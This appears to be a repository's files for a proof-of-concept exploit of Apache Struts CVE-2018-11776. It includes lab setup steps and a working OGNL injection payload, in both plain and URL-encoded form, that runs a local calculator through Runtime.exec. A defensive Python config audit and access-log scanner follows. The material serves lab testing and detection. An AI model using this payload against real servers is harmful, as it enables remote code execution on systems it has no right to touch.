/.github/FUNDING.yml:
patreon: forrestsux

/README.md:
# CVE-2018-11776

Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available.

Originally found by Man Yue Mo, Semmle: https://semmle.com/news/apache-struts-CVE-2018-11776

Semmle had an "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to Semmle: https://www.youtube.com/watch?v=5SDNX20SLJ0

Took information from the above and then started looking at the commits to the struts repo: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5

I'm too lazy to Docker or whatever the fuck...

## Setting up and Exploiting a Vulnerable Host
### Download latest Ubuntu Desktop ISO and create a virtual machine.
http://releases.ubuntu.com/18.04.1/ubuntu-18.04.1-desktop-amd64.iso?_ga=2.265574989.317727484.1535056103-825490018.1535056103

### Install dependencies:
sudo apt-get update

sudo apt-get upgrade

sudo apt-get dist-upgrade

sudo apt-get install default-jdk vim net-tools

### Set up Tomcat:
mkdir ~/sources

cd ~/sources

wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz

tar xvzf apache-tomcat-7.0.90.tar.gz

sudo mv apache-tomcat-7.0.90 /opt/tomcat

### Update bashrc with variables:
vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java

export CATALINA_HOME=/opt/tomcat

. ~/.bashrc
### Add an admin to the Tomcat gui:
sudo vim /opt/tomcat/conf/tomcat-users.xml

### Get a vulnerable Struts2 Showcase so we have something to work with:
cd ~/sources

wget http://central.maven.org/maven2/org/apache/struts/struts2-showcase/2.3.14/struts2-showcase-2.3.14.war

### Deploy the WAR file through the Tomcat gui:
$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/manager/html

### Restart Tomcat and check that the Struts2 Showcase is available:
$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/manager/html

### Add a vulnerable redirection action without a namespace:
vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

date.action

date.action is already defined, so we just added another redirect action that calls date.action.

By default, alwaysSelectFullNamespace should be set to True.

### Restart Tomcat and check out the Struts2 Showcase page:
$CATALINA_HOME/bin/shutdown.sh

$CATALINA_HOME/bin/startup.sh

http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp

### Create OGNL expression to do stuff.
Let's do what Semmle probably did in their YouTube video:
%{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}

### OGNL expression needs to be URL-encoded and stuck in before the last '/' in the URL, hitting our vulnerable help.action:
127.0.0.1:8080/struts2-showcase-2.3.14/\/help.action

127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action

Executing on the vulnerable Ubuntu host, we should see a new calc instance pop up.

### Related commits fixing the issue:
https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5

## Thoughts:
Another extremely specific, vulnerable implementation of struts. The media coverage of this vulnerability had everyone freaking out, though only the sloppiest code/configs are really vulnerable... I can't think of an efficient, stealthy way of reliably finding this vulnerability and/or exploiting it. My recommendation: just fucking upgrade struts... (or stop using it)
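As an added example (not code from this repository), two defender-side checks in Python for the two conditions the README leans on: the struts.xml section (alwaysSelectFullNamespace set to true together with a redirect action that has no namespace) and the request section (a URL-encoded OGNL expression sitting in the path segment before the action name). The first check audits a struts.xml for that combination; the second scans access-log lines for a path segment that decodes to an OGNL marker (`%{` or `${`), which is what the request above looks like on the server side. The struts.xml fragment, the `org.example.DateAction` class name, the IP addresses and the log lines are all constructed samples, and the expression in the sample log is a harmless placeholder, not the README's payload. Only the standard library is used.

```python
"""Defender-side checks for the CVE-2018-11776 pattern: a struts.xml audit
and an access-log scan. Added example, not part of this repository; the
config fragment and log lines are constructed, not captured from a host."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Constructed struts.xml: alwaysSelectFullNamespace is on, package "default"
# has no namespace, and its redirectAction result names no namespace either.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date</param>
      </result>
    </action>
  </package>
  <package name="safe" namespace="/safe" extends="struts-default">
    <action name="date" class="org.example.DateAction">
      <result>/date.jsp</result>
    </action>
  </package>
</struts>
"""

REDIRECT_TYPES = {"redirect", "redirectAction"}


def audit_struts_config(xml_text):
    """Return one finding per redirect result whose namespace would be taken
    from the request: alwaysSelectFullNamespace=true, a package with no (or a
    wildcard) namespace, and no explicit namespace param on the result.
    Limitation: only struts.xml constants are read; a value set in
    struts.properties is not seen."""
    root = ET.fromstring(xml_text)
    full_namespace = any(
        c.get("name") == "struts.mapper.alwaysSelectFullNamespace"
        and (c.get("value") or "").strip().lower() == "true"
        for c in root.iter("constant")
    )
    findings = []
    if not full_namespace:
        return findings
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns and "*" not in ns:
            continue  # fixed namespace: never taken from the URL
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                if result.get("type") not in REDIRECT_TYPES:
                    continue
                params = {p.get("name"): (p.text or "").strip()
                          for p in result.findall("param")}
                if not params.get("namespace"):
                    findings.append(
                        "package %r (namespace=%r): action %r has a %s result "
                        "without an explicit namespace"
                        % (pkg.get("name"), ns, action.get("name"),
                           result.get("type")))
    return findings


# Constructed Tomcat access-log lines (common log format). Line 2 carries the
# harmless placeholder %{(#x=1)}, percent-encoded, in the path segment before
# the action name, i.e. the namespace position the request above uses.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [22/Aug/2018:10:01:12 +0000] "GET /struts2-showcase-2.3.14/showcase.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Aug/2018:10:02:03 +0000] "GET /struts2-showcase-2.3.14/%25%7B%28%23x%3D1%29%7D/help.action HTTP/1.1" 302 -',
    '10.0.0.7 - - [22/Aug/2018:10:02:40 +0000] "GET /struts2-showcase-2.3.14/date.action?x=%7Bnot%7D HTTP/1.1" 200 2048',
]

REQUEST_PATH = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/')
OGNL_MARKER = re.compile(r"[%$]\{")


def fully_decode(text, max_rounds=3):
    """Percent-decode until stable so that both %25%7B and %7B end up as the
    literal brace; unquote() leaves non-hex sequences such as %{ untouched."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_access_log(lines):
    """Return (line number, decoded segment) for each request with a path
    segment that decodes to an OGNL marker. The query string is ignored: the
    namespace comes from the path, which is where this bug is reached."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_PATH.search(line)
        if not match:
            continue
        path = match.group(1).split("?", 1)[0]
        for segment in path.split("/"):
            decoded = fully_decode(segment)
            if OGNL_MARKER.search(decoded):
                hits.append((number, decoded))
                break
    return hits
```

Running `audit_struts_config(SAMPLE_STRUTS_XML)` reports the `help` action; setting the constant to `false` or adding a `<param name="namespace">/safe</param>` to its result clears the finding, which is the configuration-side mitigation the commit above makes unnecessary once you upgrade. `scan_access_log(SAMPLE_ACCESS_LOG)` flags only line 2, so the check is cheap enough to run over a day of Tomcat access logs to answer the "was this ever tried here" question.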